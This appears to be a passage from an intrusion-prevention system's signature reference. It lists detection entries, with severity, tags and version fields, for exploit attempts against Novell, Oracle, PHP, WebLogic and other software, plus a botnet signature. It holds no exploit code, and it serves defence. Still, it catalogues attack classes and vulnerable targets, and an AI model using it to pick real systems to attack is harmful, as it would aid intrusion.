About this situation: Attempt to exploit a buffer overflow vulnerability in Novell NetMail detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell NetMail, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-511-5211
Vulnerability: Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CS-Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass

About this situation: An attempt to exploit a vulnerability in Novell Sentinel Log Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Sentinel Log Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass
Description:
Back to top

HTTP_CS-Novell-Service-Desk-Clientimportuploadform-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Novell Service Desk detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Service Desk, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Vulnerability: Novell-Service-Desk-Clientimportuploadform-Directory-Traversal
Description:
Back to top

HTTP_CS-Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Novell Teaming detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Teaming, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Novell-ZENworks-Asset-Management-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Asset Management detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Novell ZENworks Asset Management, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: Novell-ZENworks-Asset-Management-Directory-Traversal
Description:
Back to top

HTTP_CS-Novell-ZENworks-Configuration-Management-File-Upload

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Novell-ZENworks-Configuration-Management-File-Upload
Description:
Back to top

HTTP_CS-Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal
Description:
Back to top

HTTP_CS-Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting

About this situation: Attempt to exploit cross-site scripting vulnerability in Nullsoft ShoutCast Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, SHOUTcast Server, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Openmetadata-Spel-Injection-CVE-2024-28253

About this situation: An attempt to exploit a vulnerability in OpenMetadata detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMetadata, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Openmetadata-Spel-Injection-CVE-2024-28253
Description:
Back to top

HTTP_CS-Openmrs-Webservices.rest-Insecure-Object-Deserialization

About this situation: An attempt to exploit a vulnerability in OpenMRS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMRS, CVE2018, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1144-5242
Vulnerability: Openmrs-Webservices.rest-Insecure-Object-Deserialization
Description:
Back to top

HTTP_CS-OpenX-File-Upload-PHP-Code-Execution

About this situation: An attempt to exploit an OpenX File Upload PHP Code Execution vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenX, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-723-5211
Vulnerability: OpenX-File-Upload-PHP-Code-Execution
Description:
Back to top

HTTP_CS-Opmantek-Open-Audit-Discoveries_Helper-Command-Injection

About this situation: An attempt to exploit a vulnerability in Opmantek Open-AudIT detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opmantek Open-AudIT, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1267-5242
Vulnerability: Opmantek-Open-Audit-Discoveries_Helper-Command-Injection
Description:
Back to top

HTTP_CS-Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle Access Manager detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Access Manager, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Creation

About this situation: An attempt to exploit a vulnerability in Oracle Business Transaction Management detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Business Transaction Management, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Oracle-Business-Transaction-Management-Arbitrary-File-Creation
Description:
Back to top

HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Oracle Business Transaction Management detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Transaction Management, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: Oracle-Business-Transaction-Management-Flashtunnel-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CS-Oracle-E-Business-Suite-General-Ledger-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1742-5242
Vulnerability: Oracle-E-Business-Suite-General-Ledger-SQL-Injection
Description:
Back to top

HTTP_CS-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop
Description:
Back to top

HTTP_CS-Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882
Description:
Back to top

HTTP_CS-Oracle-E-Business-Suite-Web-Applications-Desktop-Integrator-Bnedecoder-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Vulnerability: Oracle-E-Business-Suite-Desktop-Integrator-Bnedecoder-Dir-Traversal
Description:
Back to top

HTTP_CS-Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Endeca Information Discovery Integrator ETL Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Endeca Server, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal
Description:
Back to top

HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Endeca Information Discovery Integrator ETL Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Endeca Server, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal
Description:
Back to top

HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability

About this situation: An attempt to exploit a vulnerability in Oracle Endeca Information Discovery Integrator ETL Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Endeca Server, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability
Description:
Back to top

HTTP_CS-Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Oracle Endeca Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Endeca Server, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-1511-5242
Vulnerability: Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution
Description:
Back to top

HTTP_CS-Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604

About this situation: An attempt to exploit a vulnerability in Oracle Endeca Information Discovery Integrator ETL Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Endeca Server, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604
Description:
Back to top

HTTP_CS-Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Event Processing detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Event Processing, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-598-5211
Vulnerability: Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal
Description:
Back to top

HTTP_CS-Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Fusion Middleware MapViewer detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Fusion Middleware, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-895-5242
Vulnerability: Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-DirTrav
Description:
Back to top

HTTP_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution

About this situation: A vulnerability in Oracle GlassFish
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GlassFish Server, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: GlassFish-Authenticated-Code-Execution
Description:
Back to top

HTTP_CS-Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Oracle Sun GlassFish Enterprise Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GlassFish Server, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1107-5242
Vulnerability: Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities
Description:
Back to top

HTTP_CS-Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials

About this situation: An attempt to exploit a vulnerability in Oracle Identity Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Identity Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Vulnerability: Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials
Description:
Back to top

HTTP_CS-Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle JDeveloper ADF Faces detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle JDeveloper, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1216-5242
Vulnerability: Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Oracle-Virtual-Server-Agent-Command-Injection

About this situation: An attempt to exploit a vulnerability in Oracle VM detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Virtual Server, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Oracle-Virtual-Server-Agent-Command-Injection
Description:
Back to top

HTTP_CS-Oracle-WebLogic-Server-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1138-5242
Vulnerability: Oracle-WebLogic-Server-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1158-5242
Vulnerability: Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal
Description:
Back to top

HTTP_CS-Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure
Description:
Back to top

HTTP_CS-Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1029-5242
Vulnerability: Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization
Oracle-WebLogic-Server-Remote-Command-Execution-CVE-2017-3506
Description:
Back to top

HTTP_CS-Ozdok-Bot-Activity

About this situation: Ozdok Bot activity detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Ozdok-Bot
Description:
Back to top

HTTP_CS-Pacific-Poker-Login

About this situation: Pacific Poker login
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Pacific Poker, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-225-3038
Vulnerability: HTTP_Pacific-Poker
Description:
Back to top

HTTP_CS-Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Palo Alto Expedition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto Expedition, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CS-Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in PaperCut MF
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PaperCut MF/NG, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Vulnerability: Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery
Description:
Back to top

HTTP_CS-Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Parse Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Parse Server, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection
Description:
Back to top

HTTP_CS-Patrowl-PatrowlManager-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Patrowl PatrowlManager detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Patrowl PatrowlManager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Patrowl-PatrowlManager-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Percent-Encoded-Ascii-Control-Characters

About this situation: HTTP POST with percent encoded ASCII control characters
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Percent-Encoded-Ascii-Control-Characters
Description:
Back to top

HTTP_CS-Php-Arbitrary-Location-File-Upload

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2004, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Php-Arbitrary-Location-File-Upload
Description:
Back to top

HTTP_CS-Php-Core-Unserialize-Function-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Php-Core-Unserialize-Function-Integer-Overflow
Description:
Back to top

HTTP_CS-Php-Error-Loggin-Format-Strings-Vuln

About this situation: Php Error Logging Format String Vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Unix, x86, PHP, CVE2000, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Php-Error-Logging-Format-Strigs-Vulnerability
Description:
Back to top

HTTP_CS-Php-Error-Logging-Format-String-Vuln-3

About this situation: Php Error Logging Format String Vulnerability
Context: HTTP Client Stream
Severity: 10
Tags: Linux, x86, PHP, CVE2000, Linux not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Php-Error-Logging-Format-Strigs-Vulnerability
Description:
Back to top

HTTP_CS-Php-Error-Logging-Format-Strings-Vuln-2

About this situation: Php Error Logging Format String Vulnerability
Context: HTTP Client Stream
Severity: 10
Tags: Linux, x86, PHP, CVE2000, Linux not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Php-Error-Logging-Format-Strigs-Vulnerability
Description:
Back to top

HTTP_CS-Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
Description:
Back to top

HTTP_CS-Php-EXIF-Header-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-503-5211
Vulnerability: Php-EXIF-Header-Parsing-Integer-Overflow
Description:
Back to top

HTTP_CS-Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service
Description:
Back to top

HTTP_CS-Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-613-5211
